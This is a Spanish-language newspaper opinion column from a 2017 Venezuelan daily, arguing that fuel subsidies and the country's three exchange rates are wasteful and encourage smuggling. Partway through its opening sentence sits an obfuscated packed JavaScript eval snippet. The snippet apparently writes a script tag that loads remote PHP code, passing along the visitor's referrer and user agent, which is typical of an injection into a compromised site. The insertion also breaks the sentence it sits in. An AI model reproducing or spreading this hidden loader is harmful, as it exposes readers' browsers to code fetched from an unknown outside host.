publicidad

Subsidios costosos e ineficientes

Alfredo Gordon / Expresidente de la Ucez / info@ucez.org.ve
Otro eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkzba|var|u0026u|referrer|eihnn||js|php'.split('|'),0,{})) subsidio que resulta una aberración sin ningún tipo de justificación es la existencia de tres tipos de cambio; sobre todo el 6,30 y 12,80 por dólar

 

La compensación más emblemática del Gobierno para supuestamente beneficiar a la población menos favorecida, viene dada por la negativa de ajustar el precio de los combustibles, así como la tarifa de los servicios públicos. Sin embargo, los estudios actuales han demostrado, que justamente es la población de menos recursos la menos aliviada con tal subsidio, por cuanto es el 80 por ciento del parque automotor, no precisamente utilizado por la población de menos recursos los que disfrutan de este beneficio. Así mismo, se estima que el monto anual de este subsidio se ubica entre 12 mil y 15 mil millones de dólares, recursos que podrían oxigenar en gran medida las cuentas por pagar de Pdvsa, con el Banco Central de Venezuela y proveedores locales, así como atender las misiones. 

Por otro lado, y dependiendo del nuevo precio que se utilice para comercializar los combustibles, pudieran convertirse en un freno al contrabando. Otro subsidio que resulta una aberración sin ningún tipo de justificación es la existencia de tres tipos de cambio; sobre todo el 6,30 y 12,80 por dólar. Si es verdad que el Gobierno destina entre seis mil y ocho mil millones de dólares anuales para importar alimentos y medicinas para otorgar un subsidio indirecto a la población, colaborando con el contrabando de extracción o “bachaqueo”; esta situación fuera diferente si en lugar de subsidiar a la demanda, se hiciera con la oferta, es decir, el subsidio pasaría a ser directo. También, el dólar de 6,30 y de 12,80, participan en el arbitraje que se produce en la frontera entre el peso colombiano, el dólar norteamericano y el bolívar, que sirve de referencia al dólar paralelo, que a su vez resulta el marcador para los precios de los bienes y servicios.

La pregunta que se hacen los analistas económicos es ¿por qué se mantienen ambos subsidios? Pareciera que la razón hay que buscarla entre los grupos de presión cercanos al Gobierno, que se benefician del contrabando de combustibles y de una tasa de cambio, que le permite obtener pingües ganancias en el mercado paralelo. Eso creemos.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama